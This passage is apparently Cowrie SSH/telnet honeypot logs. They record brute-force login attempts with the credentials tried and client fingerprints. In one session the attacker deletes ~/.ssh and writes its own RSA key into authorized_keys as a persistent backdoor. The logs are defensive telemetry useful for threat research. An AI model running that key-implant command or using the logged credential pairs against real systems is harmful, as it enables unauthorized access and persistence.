ib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:50:29.183976Z","src_ip":"171.243.150.185","session":"d722cbbede3b"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T17:50:34.953153Z","src_ip":"171.243.150.185","session":"d722cbbede3b"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:50:37.619686Z","src_ip":"171.243.150.185","session":"d722cbbede3b"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":34744,"dst_ip":"1.2.3.4","dst_port":22,"session":"115991fa79c3","protocol":"ssh","message":"New connection: 199.195.253.95:34744 (1.2.3.4:22) [session: 115991fa79c3]","sensor":"my-vps","timestamp":"2025-08-28T17:50:56.724093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:50:56.744160Z","src_ip":"199.195.253.95","session":"115991fa79c3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:50:56.962941Z","src_ip":"199.195.253.95","session":"115991fa79c3"}
{"eventid":"cowrie.login.failed","username":"emma","password":"emma","message":"login attempt [emma/emma] failed","sensor":"my-vps","timestamp":"2025-08-28T17:50:57.739954Z","src_ip":"199.195.253.95","session":"115991fa79c3"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:50:58.935545Z","src_ip":"199.195.253.95","session":"115991fa79c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45638,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e5acb18953","protocol":"ssh","message":"New connection: 212.227.235.229:45638 (1.2.3.4:22) [session: e5e5acb18953]","sensor":"my-vps","timestamp":"2025-08-28T17:51:12.769903Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:51:12.770897Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:51:12.878492Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28021993","message":"login attempt [admin/28021993] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:13.635320Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121987","message":"login attempt [admin/27121987] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:14.747836Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27121984","message":"login attempt [admin/27121984] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:15.857904Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27101993","message":"login attempt [admin/27101993] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:16.969562Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.login.failed","username":"admin","password":"27081983","message":"login attempt [admin/27081983] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:18.080322Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:51:19.190333Z","src_ip":"212.227.235.229","session":"e5e5acb18953"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":43806,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aea13e0ab0c","protocol":"ssh","message":"New connection: 171.243.150.185:43806 (1.2.3.4:22) [session: 1aea13e0ab0c]","sensor":"my-vps","timestamp":"2025-08-28T17:51:46.057837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:51:46.061520Z","src_ip":"171.243.150.185","session":"1aea13e0ab0c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:51:46.288542Z","src_ip":"171.243.150.185","session":"1aea13e0ab0c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T17:51:48.107069Z","src_ip":"171.243.150.185","session":"1aea13e0ab0c"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:51:50.021760Z","src_ip":"171.243.150.185","session":"1aea13e0ab0c"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":36702,"dst_ip":"1.2.3.4","dst_port":23,"session":"1d901e7a2551","protocol":"telnet","message":"New connection: 176.65.149.186:36702 (1.2.3.4:23) [session: 1d901e7a2551]","sensor":"my-vps","timestamp":"2025-08-28T17:51:53.355924Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:51:53.392994Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:51:53.414753Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T17:51:53.416087Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T17:51:53.417068Z","src_ip":"176.65.149.186","session":"1d901e7a2551"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.185","src_port":35044,"dst_ip":"1.2.3.4","dst_port":22,"session":"139b73db3d65","protocol":"ssh","message":"New connection: 171.243.150.185:35044 (1.2.3.4:22) [session: 139b73db3d65]","sensor":"my-vps","timestamp":"2025-08-28T17:51:55.650187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:51:56.018687Z","src_ip":"171.243.150.185","session":"139b73db3d65"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:52:01.331093Z","src_ip":"171.243.150.185","session":"139b73db3d65"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-28T17:52:04.468449Z","src_ip":"171.243.150.185","session":"139b73db3d65"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":59948,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecab798e6a4a","protocol":"ssh","message":"New connection: 199.195.253.95:59948 (1.2.3.4:22) [session: ecab798e6a4a]","sensor":"my-vps","timestamp":"2025-08-28T17:52:04.525094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:52:04.532885Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:52:04.676690Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.login.success","username":"root","password":"Pa55w0rd","message":"login attempt [root/Pa55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:52:05.225135Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:52:05.526288Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:52:05.527023Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:52:05.528334Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:05.691761Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:52:05.983509Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:52:05.984285Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:52:06.153892Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:06.154736Z","src_ip":"199.195.253.95","session":"ecab798e6a4a"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":60654,"dst_ip":"1.2.3.4","dst_port":22,"session":"db61e60944f4","protocol":"ssh","message":"New connection: 199.195.253.95:60654 (1.2.3.4:22) [session: db61e60944f4]","sensor":"my-vps","timestamp":"2025-08-28T17:52:06.281622Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:52:06.288362Z","src_ip":"199.195.253.95","session":"db61e60944f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:52:06.414896Z","src_ip":"199.195.253.95","session":"db61e60944f4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:52:07.064828Z","src_ip":"199.195.253.95","session":"db61e60944f4"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:07.817322Z","src_ip":"171.243.150.185","session":"139b73db3d65"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:52:08.241798Z","src_ip":"199.195.253.95","session":"db61e60944f4"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":33348,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f1a58bfe502","protocol":"ssh","message":"New connection: 199.195.253.95:33348 (1.2.3.4:22) [session: 8f1a58bfe502]","sensor":"my-vps","timestamp":"2025-08-28T17:52:08.429515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:52:08.436633Z","src_ip":"199.195.253.95","session":"8f1a58bfe502"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-g